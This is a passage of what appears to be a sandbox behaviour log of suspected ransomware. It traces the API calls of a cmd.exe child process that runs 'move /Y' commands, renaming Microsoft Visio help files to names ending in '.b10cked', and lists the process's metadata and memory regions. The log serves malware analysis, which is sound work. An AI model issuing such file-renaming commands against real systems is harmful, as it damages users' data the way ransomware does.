lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x4, lpData=0x16edd8*=0x9, lpcbData=0x16edd0*=0x4) returned 0x0 [0202.491] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x0, lpData=0x16edd8*=0x9, lpcbData=0x16edd0*=0x1000) returned 0x2 [0202.491] RegCloseKey (hKey=0x40) returned 0x0 [0202.491] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a4 [0202.491] srand (_Seed=0x5b8863a4) [0202.491] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.DEV.14.1033.hxn.b10cked\"" [0202.491] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.DEV.14.1033.hxn.b10cked\"" [0202.491] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.491] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3218f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.491] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.491] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.492] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.492] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.492] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.492] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.492] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.492] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.492] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.492] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.492] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.492] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.492] GetEnvironmentStringsW () returned 0x3222e0* [0202.492] FreeEnvironmentStringsW (penv=0x3222e0) returned 1 [0202.492] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.492] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.492] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.492] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.492] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.492] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.492] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.492] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.492] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.492] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.492] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16fb98 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.492] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16fb98, lpFilePart=0x16fb94 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16fb94*="Desktop") returned 0x18 [0202.492] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.492] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f914 | out: lpFindFileData=0x16f914) returned 0x320020 [0202.493] FindClose (in: hFindFile=0x320020 | out: hFindFile=0x320020) returned 1 [0202.493] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f914 | out: lpFindFileData=0x16f914) returned 0x320020 [0202.493] FindClose (in: hFindFile=0x320020 | out: hFindFile=0x320020) returned 1 [0202.493] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f914 | out: lpFindFileData=0x16f914) returned 0x320020 [0202.493] FindClose (in: hFindFile=0x320020 | out: hFindFile=0x320020) returned 1 [0202.493] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.493] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0202.493] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0202.493] GetEnvironmentStringsW () returned 0x322b00* [0202.493] FreeEnvironmentStringsW (penv=0x322b00) returned 1 [0202.493] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.494] GetConsoleOutputCP () returned 0x1b5 [0202.494] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.494] GetUserDefaultLCID () returned 0x409 [0202.494] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0202.494] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fcd8, cchData=128 | out: lpLCData="0") returned 2 [0202.494] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fcd8, cchData=128 | out: lpLCData="0") returned 2 [0202.494] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fcd8, cchData=128 | out: lpLCData="1") returned 2 [0202.494] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0202.494] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0202.494] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0202.494] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0202.494] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.494] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0202.494] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0202.494] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0202.495] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0202.495] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0202.495] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.495] GetConsoleTitleW (in: lpConsoleTitle=0x3108e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.496] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.496] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0202.496] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0202.496] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0202.496] _wcsicmp (_String1="move", _String2=")") returned 68 [0202.496] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0202.496] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0202.496] _wcsicmp (_String1="IF", _String2="move") returned -4 [0202.496] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0202.496] _wcsicmp (_String1="REM", _String2="move") returned 5 [0202.496] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0202.499] GetConsoleTitleW (in: lpConsoleTitle=0x16f9d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.500] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0202.500] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0202.500] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0202.500] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0202.500] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0202.500] _wcsicmp (_String1="move", _String2="CD") returned 10 [0202.500] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0202.500] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0202.500] _wcsicmp (_String1="move", _String2="REN") returned -5 [0202.500] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0202.500] _wcsicmp (_String1="move", _String2="SET") returned -6 [0202.500] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0202.500] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0202.500] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0202.500] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0202.500] _wcsicmp (_String1="move", _String2="MD") returned 11 [0202.500] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0202.500] _wcsicmp (_String1="move", _String2="RD") returned -5 [0202.500] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0202.500] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0202.500] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0202.500] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0202.500] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0202.500] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0202.500] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0202.500] _wcsicmp (_String1="move", _String2="VER") returned -9 [0202.500] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0202.500] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0202.500] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0202.500] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0202.500] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0202.500] _wcsicmp (_String1="move", _String2="START") returned -6 [0202.500] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0202.500] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0202.500] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0202.502] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.502] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.502] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f78c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f784, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f784*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.503] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.503] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.503] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.503] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.503] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.503] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.503] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.503] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.503] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.503] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0202.503] _wcsicmp (_String1="MSVISI~3.HXN", _String2=".") returned 63 [0202.503] _wcsicmp (_String1="MSVISI~3.HXN", _String2="..") returned 63 [0202.503] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msvisi~3.hxn")) returned 0x2022 [0202.503] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x321e50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.503] SetErrorMode (uMode=0x0) returned 0x0 [0202.503] SetErrorMode (uMode=0x1) returned 0x0 [0202.503] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN", nBufferLength=0x104, lpBuffer=0x16f114, lpFilePart=0x16f0fc | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN", lpFilePart=0x16f0fc*="MSVISI~3.HXN") returned 0x27 [0202.503] SetErrorMode (uMode=0x0) returned 0x1 [0202.504] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0202.504] _wcsicmp (_String1="MSVISI~3.HXN", _String2=".") returned 63 [0202.504] _wcsicmp (_String1="MSVISI~3.HXN", _String2="..") returned 63 [0202.504] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msvisi~3.hxn")) returned 0x2022 [0202.504] SetErrorMode (uMode=0x0) returned 0x0 [0202.504] SetErrorMode (uMode=0x1) returned 0x0 [0202.504] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN", nBufferLength=0x104, lpBuffer=0x16f590, lpFilePart=0x16f328 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN", lpFilePart=0x16f328*="MSVISI~3.HXN") returned 0x27 [0202.504] SetErrorMode (uMode=0x0) returned 0x1 [0202.504] SetErrorMode (uMode=0x0) returned 0x0 [0202.504] SetErrorMode (uMode=0x1) returned 0x0 [0202.504] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.DEV.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x16f798, lpFilePart=0x16f328 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.DEV.14.1033.hxn.b10cked", lpFilePart=0x16f328*="MS.VISIO.DEV.14.1033.hxn.b10cked") returned 0x3b [0202.504] SetErrorMode (uMode=0x0) returned 0x1 [0202.504] SetLastError (dwErrCode=0x0) [0202.504] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.DEV.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.visio.dev.14.1033.hxn.b10cked")) returned 0xffffffff [0202.504] GetLastError () returned 0x2 [0202.504] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN", fInfoLevelId=0x1, lpFindFileData=0x16eca4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16eca4) returned 0x310e88 [0202.504] FindNextFileW (in: hFindFile=0x310e88, lpFindFileData=0x16eca4 | out: lpFindFileData=0x16eca4) returned 0 [0202.505] FindClose (in: hFindFile=0x310e88 | out: hFindFile=0x310e88) returned 1 [0202.505] GetLastError () returned 0x12 [0202.505] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN", fInfoLevelId=0x1, lpFindFileData=0x16eca4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16eca4) returned 0x310e88 [0202.505] FindNextFileW (in: hFindFile=0x310e88, lpFindFileData=0x16eca4 | out: lpFindFileData=0x16eca4) returned 0 [0202.505] FindClose (in: hFindFile=0x310e88 | out: hFindFile=0x310e88) returned 1 [0202.505] GetLastError () returned 0x12 [0202.506] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN", fInfoLevelId=0x1, lpFindFileData=0x321bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321bf0) returned 0x310e88 [0202.506] FindNextFileW (in: hFindFile=0x310e88, lpFindFileData=0x321bf0 | out: lpFindFileData=0x321bf0) returned 0 [0202.506] FindClose (in: hFindFile=0x310e88 | out: hFindFile=0x310e88) returned 1 [0202.506] GetLastError () returned 0x12 [0202.506] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN", fInfoLevelId=0x1, lpFindFileData=0x321bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321bf0) returned 0x310e88 [0202.506] FindNextFileW (in: hFindFile=0x310e88, lpFindFileData=0x321bf0 | out: lpFindFileData=0x321bf0) returned 0 [0202.506] FindClose (in: hFindFile=0x310e88 | out: hFindFile=0x310e88) returned 1 [0202.506] GetLastError () returned 0x12 [0202.507] _get_osfhandle (_FileHandle=2) returned 0xb [0202.507] GetFileType (hFile=0xb) returned 0x2 [0202.663] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0202.664] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16ee74 | out: lpMode=0x16ee74) returned 1 [0202.664] _get_osfhandle (_FileHandle=2) returned 0xb [0202.664] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x16eea8 | out: lpConsoleScreenBufferInfo=0x16eea8) returned 1 [0202.664] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.665] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x16eee8 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.665] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x16eecc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x16eecc*=0x2c) returned 1 [0202.665] longjmp () [0202.665] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.665] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.666] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.666] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.666] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.666] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.666] SetConsoleInputExeNameW () returned 0x1 [0202.666] GetConsoleOutputCP () returned 0x1b5 [0202.666] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.666] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.666] exit (_Code=1) Process: id = "479" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d00" os_pid = "0xd90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.SHAPESHEET.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29376 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29377 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 29378 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 29379 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 29380 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29381 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29382 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29383 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29384 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 29385 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29854 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29855 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29856 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 29857 start_va = 0x290000 end_va = 0x2f6fff entry_point = 0x290000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29858 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 29859 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29860 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29861 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29862 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29863 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29864 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29865 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29866 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29867 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29868 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 29869 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29870 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" 